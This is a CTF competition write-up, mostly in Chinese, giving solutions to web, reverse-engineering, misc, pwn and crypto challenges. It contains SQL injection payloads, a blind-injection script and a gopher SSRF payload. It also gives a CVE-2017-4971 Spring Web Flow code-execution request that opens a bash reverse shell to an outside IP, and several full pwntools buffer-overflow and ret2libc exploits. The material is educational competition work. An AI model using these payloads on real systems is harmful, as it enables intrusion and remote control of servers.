WEB
1.middle_magic
%0a绕过第一关最后加%23是#
数组绕过第二关
json 弱类型比较
http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23
POST:
admin[]=1&root_pwd[]=2&level_3={"result":0}
flag{f03d41bf6c8d55f12324fd57f7a00427}
2.easy_sql_2
mysql8.0,table statement:
过滤了information_schema.table用mysql.innodb_table_stats
admin'/**/and/**/(('ctf','%s',3,4,5,6)<=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#
注出来flag表fl11aag
16进制注一下:
import string
import requests
import time
req = requests.session()
url = "http://182.116.62.85:26571/login.php"
def hh():
payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"
chars = string.printable.replace(".","").replace("?","").replace("`","").replace("+","") + "_\{}"
result = ""
for i in range(1,100):
for j in range(48,125):
data = {'username':payload%(i,j),'password':"admin"}
rep = req.post(url,data)
text = rep.text
if "success" in text:
print(j)
result += chr(j)
# print((chr(j)),end="")
# payload = payload%(chr(j-1)+'%s')
print(result)
break
hh()
3. easy_sql_1
admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#
Exp:
gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A
4. spring
题目为CVE-2017-4971-Spring Web Flow远程代码执行漏洞
xman原题:
https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/
进入登录页面以后随便填一个给出的账号登录
然后进入http://ip/hotels/1页面点击Book Hotel
然后随便填写信息后点击Proceed按钮跳转到确认页面
点击Confirm抓包,输入payload后服务器开启监听
_eventId_confirm=&_csrf=bcc5ce94-5277-4064-b5f7-850432e3d2f0&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/121.40.134.251/10086+0>%261")).start()=vulhub
然后发送数据包等待服务器连接
成功getshell,在根目录发现flag.txt文件,查看得到flag
flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}
5.easypy
<?php
include 'utils.php';
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if ($guess === $secret) {
$message = 'Congratulations! The flag is: ' . $flag;
} else {
$message = 'Wrong. Try Again';
}
}
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
exit("hacker :)");
}
if (isset($_GET['show_source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}else{
show_source(__FILE__);
}
?>
原题魔改,参考连接:https://www.gem-love.com/ctf/1898.html
直接打:http://182.116.62.85:21895/index.php/utils.php/%81?show[source
或者
/index.php/utils.php/%ff/?show[source
Reverse
1.DesignEachStep
2.AreYouRich
3.petition
import os#flag = "flag{96c69646-8184-4363-8de9-73f7398066c1}"
addr_l = [0x5655619c, 0x5655622a, 0x565562b8, 0x56556344, 0x565563d0, 0x5655645c, 0x565564e8, 0x56556574, 0x56556602, 0x5655668e, 0x5655671c, 0x565567a6,\0x56556834, 0x565568c2, 0x5655694e, 0x565569da, 0x56556a64, 0x56556aee, 0x56556b7a, 0x56556c06, 0x56556c94, 0x56556d20, 0x56556daa, 0x56556e34,\0x56556ec2, 0x56556f4e, 0x56556fda, 0x56557064, 0x565570f0, 0x5655717a, 0x56557208, 0x56557292, 0x5655731e, 0x565573ac, 0x5655743a, 0x565574c4,\0x56557552, 0x565575de, 0x5655766c, 0x565576fa, 0x56557784, 0x56557810, 0x5655789c]flag = ""
for addr in addr_l:with open('script', 'w') as f:temp = """break *{0} if $pc == {1}
commands
silent
printf "blogg9ggg"
continue
endrun""".format(hex(addr), hex(addr))f.write(temp)f.close()i = 32while(i <= 127):tflag = flag + chr(i)with open('in', 'w') as f:f.write(tflag)f.close()os.system("gdb ./Petition -batch -x script > log < in")ok = Falsewith open("log") as f:temp = f.read()if(temp.find("blogg9ggg") != -1):ok = Truef.close()if(ok == True):flag += chr(i)breaki += 1print(flag)
MISC
1.流量分析
tshark -r timu.pcapng -T fields -e http.request.full_uri|tr -s '\n'|grep flag > log
import re with open('log') as f: tmp = f.read() flag = '' data = re.findall(r'=(\d*)--',tmp) data = [int(i) for i in data] for i,num in enumerate(data): try: if num > data[i+1]: flag += chr(num) except Exception: pass print(flag) #flag{w1reshARK_ez_1sntit} 或者 下载附件以后得到一个数据包,用Wireshark分析流量发现sql注入数据,筛选出http数据仔细查看是布尔盲注
记录下每次最大ASCII码数据包然后ASCII码转字符得到flag
2.a_misc
result = [102, 108, 97, 103, 123, 99, 100, 50, 99, 51, 101, 50, 102, 101, 97, 52, 54, 51, 100, 101, 100, 57, 97, 102, 56, 48, 48, 100, 55, 49, 53, 53, 98, 101, 55, 97, 113, 125] flag = "" for i in result: flag +=chr(i) print(flag) #flag{cd2c3e2fea463ded9af800d7155be7aq}
3.Misc2
下载附件只有一个check.pnd的图片,修改高度后依然没有结果,查看文件属性发现位深度是32位,想到LSB隐写,用Stegsolve查看alpha通道为0时图片是空白,所以判断alpha通道不存在数据
查看红蓝绿最低为信息发现16进制编码
发现存在16进制
? flag{h0w_4bouT_enc0de_4nd_pnG}m?
这里直接转10进制再转下ascii即可
flag{h0w_4bouT_enc0de_4nd_pnG}
4.m1
flag{5cae25efeb73d7ba22f7728427376f59}
5. new_misc
PWN
1.echo
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./easyecho'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=process(elfelf)
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=remote('182.116.62.85',24842)
clibc.srand(clibc.time(0))
# libc=ELF('./libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
pay='a'*0x10
io.recv()
io.send(pay)
io.recvuntil('a'*0x10)
elf_base=u64(io.recv(6)+'\x00\x00')-0xcf0+0x202040
io.sendline('backdoor')
io.recv()
# gdb.attach(io,gdb_text)
io.sendline('a'*0x168+p64(elf_base))
io.recv()
io.sendline('exitexit')
# io.sendline(pay)
# success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
# gdb.attach(io,gdb_text)
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
2.supermarket
原题 网上找的脚本
#coding:utf-8
from pwn import *
# context.log_level = 'debug'
debug = 0
if debug == 1:
r = process('./task_supermarket')
# gdb.attach(r)
else:
r = remote('182.116.62.85',27518)
def add(name, price, descrip_size, description):
r.recvuntil('your choice>> ')
r.send('1\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('price:')
r.send(str(price) + '\n')
r.recvuntil('descrip_size:')
r.send(str(descrip_size) + '\n')
r.recvuntil('description:')
r.send(str(description) + '\n')
def dele(name):
r.recvuntil('your choice>> ')
r.send('2\n')
r.recvuntil('name:')
r.send(name + '\n')
def lis():
r.recvuntil('your choice>> ')
r.send('3\n')
r.recvuntil('all commodities info list below:\n')
return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')]
def changePrice(name, price):
r.recvuntil('your choice>> ')
r.send('4\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('input the value you want to cut or rise in:')
r.send(str(price) + '\n')
def changeDes(name, descrip_size, description):
r.recvuntil('your choice>> ')
r.send('5\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('descrip_size:')
r.send(str(descrip_size) + '\n')
r.recvuntil('description:')
r.send(description + '\n')
def exit():
r.recvuntil('your choice>> ')
r.send('6\n')
add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')
def leak_one(address):
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(address))
res = lis().split('des.')[-1]
if(res == '\n'):
return '\x00'
return res[0]
def leak(address):
content = leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)
log.info('%#x => %#x'%(address, u32(content)))
return content
d = DynELF(leak, elf = ELF('./task_supermarket'))
system_addr = d.lookup('system', 'libc')
log.info('system \'s address = %#x'%(system_addr))
bin_addr = 0x0804B0B8
changeDes('1', 0x8, '/bin/sh\x00')
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
dele('1')
r.sendline('cat flag')
r.interactive()
3.task_babyof
from pwn import *
from pwn import p64, u64, p32, u32, p8
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'sp', '-h']
elf = ELF('./babyof')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
libc = ELF('./libc-2.27.so')
# io = process('./babyof')
io = remote('182.116.62.85','21613')
prdi = 0x0000000000400743 # : pop rdi
prsi = 0x0000000000400741 # : pop rsi ; pop r15 ; ret
def exp():
io.recvuntil('Do you know how to do buffer overflow?')
payload = b'a'*0x48 + \
p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)
io.send(payload)
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
info(hex(leak))
libc_base = leak - libc.sym['puts']
system = libc_base + libc.sym['system']
info(hex(system))
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
io.recvuntil('Do you know how to do buffer overflow?')
payload = b'a'*0x48 + p64(prdi) + p64(binsh)+p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system) # + p64(0x40066b)
# gdb.attach(io)
io.send(payload)
exp()
io.interactive()
或者
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
p=remote('182.116.62.85',21613)
elf=ELF('1')
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
libc=ELF('libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p=remote('node4.buuoj.cn',26442)
#libc=ELF('/ctf/work/buuoj/buu_libc/libc-2.27_64.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
gdb.attach(p)
pause()
def lg(name,val):
log.success(name+' : '+hex(val))
def add():
p.recvuntil('Give me your choice : ')
p.sendline('1')
ret=0x0000000000400506
pop_rdi=0x0000000000400743
p.recvuntil('Do you know how to do buffer overflow?')
payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x400632 )
p.send(payload)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']
print hex(libc.address)
payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
p.send(payload)
p.recvuntil('Do you know how to do buffer overflow?')
p.send(payload)
p.interactive()
4.task_littleof
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='littleof'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=process(elfelf)
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=remote('182.116.62.85',27056)
clibc.srand(clibc.time(0))
libc=ELF('./libc-2.27.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
pay='a'*0x49
io.recv()
io.send(pay)
io.recvuntil('a'*0x49)
canary='\x00'+io.recv(7)
pay='a'*0x48+canary+p64(0)+p64(0x400863)
pay+=p64(elf.got['puts'])+p64(elf.plt['puts'])
pay+=p64(0x400789)
io.recv()
io.send(pay)
libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
pay='a'*0x48+canary+p64(0)+p64(0x400863)
pay+=p64(bin_sh_addr)
pay+=p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system_addr)
pay+=p64(0x400600)
io.recv()
io.sendline('a')
io.recvuntil('Try harder!')
# gdb.attach(io,gdb_text)
io.sendline(pay)
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
# gdb.attach(io,gdb_text)
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
5.task_onecho
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./onecho'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
gdb_text='''
telescope $rebase(0x202040) 16
'''
if len(sys.argv)==1 :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=process(elfelf)
# io=process(['./'],env={'LD_PRELOAD':'./'})
clibc.srand(clibc.time(0))
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :
clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=remote('182.116.62.85',24143)
clibc.srand(clibc.time(0))
libc=ELF('./libc.so.6')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
pay='../flag'+'\x00'*0x105+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x100)
pay+=p32(0x08049812)+p32(0x0804c800)+p32(0x0804c800)
pay+=p32(0x08049180)+p32(0x8049224)+p32(0x804BFC8)
io.recv()
# gdb.attach(io,gdb_text)
io.sendline(pay)
libc_base=u32(io.recvuntil('\xf7')[-4:])-libc.sym['puts']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
pay='\x00'*0x10c+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x10)
pay+=p32(libc.sym['open'])+p32(0x08049811)+p32(0x0804c801)+p32(0)+p32(0)
pay+=p32(0x08049130)+p32(0x08049811)+p32(3)+p32(0x0804c900)+p32(0x30)
pay+=p32(libc.sym['write'])+p32(0x08049811)+p32(1)+p32(0x0804c900)+p32(0x30)
io.recv()
# gdb.attach(io,gdb_text)
io.sendline(pay)
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
# gdb.attach(io,gdb_text)
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
或者
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
p=remote('182.116.62.85',27056)
elf=ELF('1')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
gdb.attach(p)
pause()
def lg(name,val):
log.success(name+' : '+hex(val))
pop_rdi=0x0000000000400863
pop_rsi_r15=0x0000000000400861
ret=0x000000000040059e
p.recvuntil('Do you know how to do buffer overflow?')
p.send(0x49*'a')
p.recvuntil(0x49*'a')
canary=u64('\x00'+p.recv(7))
bp=u64(p.recv(6).ljust(8,'\x00'))
print hex(bp)
print hex(canary)
payload=0x48*'a'+p64(canary)+p64(bp)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x4006E2)
p.recvuntil('Try harder!')
p.send(payload)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']
payload=0x48*'a'+p64(canary)+p64(bp-8)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
#debug()
p.send(payload)
p.recvuntil('Try harder!')
p.send(payload)
p.interactive()
6.easycho
解题思路
通过恶意更改canary触发smash打印出flag
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
p=remote('182.116.62.85',24842)
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
#context.log_level='debug'
def debug():
gdb.attach(p)
pause()
def lg(name,val):
log.success(name+' : '+hex(val))
p.recvuntil('Name: ')
p.sendline(16*'a')
p.recvuntil(16*'a')
base=u64(p.recv(6).ljust(8,'\x00'))-3312
lg('base',base)
p.recvuntil('Input: ')
p.sendline(0x100*'b'+0x50*'a'+p64(0x111)+p64(0x1111)+p64(base+0x202040)+p64(base+0x202040))
p.recvuntil('Input: ')
p.sendline('backdoor')
#debug()
p.recvuntil('Input: ')
p.sendline('exitexit')
p.interactive()
Crypto
原题:
http://www.3fwork.com/kaifa200/004475MYM012472/
1.a_crypto
ROT13编码,解码后得
得到:
4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
16进制串转字符串得
a = "4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35"
for i in range(0,len(a),2):
print(chr(eval('0x'+a[i]+a[i+1])),end="")
#KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
得到:
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
base32串解码得
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
base64解码得
W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
base85解码得
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}
或者
利用ciphey工具
2.easy_crypto
公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐
下载完打开一看,这不是核心价值观编码,直接解一下
社会主义核心价值观加密,在线解http://www.atoolbox.net/Tool.php?Id=850
3. babyrsa
原题
http://www.zbc53.top/archives/148/
题目:
4.Crazy_Rsa_Tech
附上题目源码文件:
https://pan.baidu.com/s/1HG5Q1cxFWWi4-gaoOPKGFw 提取码: 2ac6 https://mp.weixin.qq.com/s/WGEjSSNDJuZcnqJJev5zGQhttps://mp.weixin.qq.com/s/TZt0oUkmgJYe21SbcS5Ybwhttps://blog.csdn.net/qq_51724251/article/details/120658086